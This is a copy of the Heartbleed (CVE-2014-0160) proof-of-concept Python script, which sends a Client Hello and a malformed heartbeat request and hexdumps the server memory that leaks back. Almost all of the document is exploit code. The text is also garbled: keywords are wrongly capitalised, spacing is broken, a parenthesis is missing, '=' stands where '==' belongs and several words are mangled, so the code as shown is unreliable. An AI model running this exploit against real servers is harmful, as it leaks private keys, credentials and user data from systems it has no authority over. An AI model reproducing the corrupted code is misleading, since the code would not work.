Heartbleed vulnerability exploitation program

#! /Usr/bin/python



# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])

# The author disclaims copyright to this source code.



Import sys

Import struct

Import socket

Import time

Import select

Import re

From optparse import OptionParser



Options = OptionParser (usage = '% prog server [options]', description = 'Test for SSL heartbeat vulnerability (CVE-2014-0160 )')

Options. add_option ('-p',' -- port', type = 'int', default = 443, help = 'tcp port to test (default: 443 )')



Def h2bin (x ):

Return x. replace ('',''). replace ('\ n', ''). decode ('Hex ')



Hello = h2bin ('''

16 03 02 00 dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf

Bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88

00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c

C0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09

C0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44

C0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c

C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00

00 0f 00 01 01

''')



Hb = h2bin ('''

18 03 02 00 03

01 40 00

''')



Def hexdump (s ):

For B in xrange (0, len (s), 16 ):

Lin = [c for c in s [B: B + 16]

Hxdat = ''. join ('% 02x' % ord (c) for c in lin)

Pdat = ''. join (c if 32 <= ord (c) <= 126 else '.') for c in lin)

Print '% 04x: %-48 s % s' % (B, hxdat, pdat)

Print



Def recvall (s, length, timeout = 5 ):

Endtime = time. time () + timeout

Rdata =''

Remain = length

While remain> 0:

Rtime = endtime-time. time ()

If rtime <0:

Return None

R, w, e = select. select ([s], [], [], 5)

If s in r:

Data = s. recv (remain)

# EOF?

If not data:

Return None

Rdata + = data

Remain-= len (data)

Return rdata

        



Def recvmsg (s ):

Hdr = recvall (s, 5)

If hdr is None:

Print 'unexpected EOF processing ing record header-server closed connection'

Return None, None, None

Typ, ver, ln = struct. unpack ('> bhh', hdr)

Pay = recvall (s, ln, 10)

If pay is None:

Print 'unexpected EOF processing ing record payload-server closed connection'

Return None, None, None

Print '... received message: type = % d, ver = % 04x, length = % d' % (typ, ver, len (pay ))

Return typ, ver, pay



Def hit_hb (s ):

S. send (hb)

While True:

Typ, ver, pay = recvmsg (s)

If typ is None:

Print 'no heartbeat response encoded ed, server likely not vulnerable'

Return False



If typ = 24:

Print 'stored Ed heartbeat response :'

Hexdump (pay)

# Print pay

If len (pay)> 3:

Print 'Warning: server returned more data than it shoshould-server is vulnerable! '

Else:

Print 'server processed malformed heartbeat, but did not return any extra data .'

Return True



If typ = 21:

Print 'stored Ed alert :'

Hexdump (pay)

Print 'server returned error, likely not vulnerable'

Return False



Def main ():

Opts, args = options. parse_args ()

If len (args) <1:

Options. print_help ()

Return



S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

Print 'ing ing ...'

Sys. stdout. flush ()

S. connect (args [0], opts. port ))

Print 'sending Client Hello ...'

Sys. stdout. flush ()

S. send (hello)

Print 'waiting for Server Hello ...'

Sys. stdout. flush ()

While True:

Typ, ver, pay = recvmsg (s)

If typ = None:

Print 'server closed connection without sending Server Hello .'

Return

# Look for server hello done message.

If typ = 22 and ord (pay [0]) = 0x0E:

Break



Print 'sending heartbeat request ...'

Sys. stdout. flush ()

S. send (hb)

Hit_hb (s)



If _ name _ = '_ main __':

Main ()

Heartbleed vulnerability exploitation program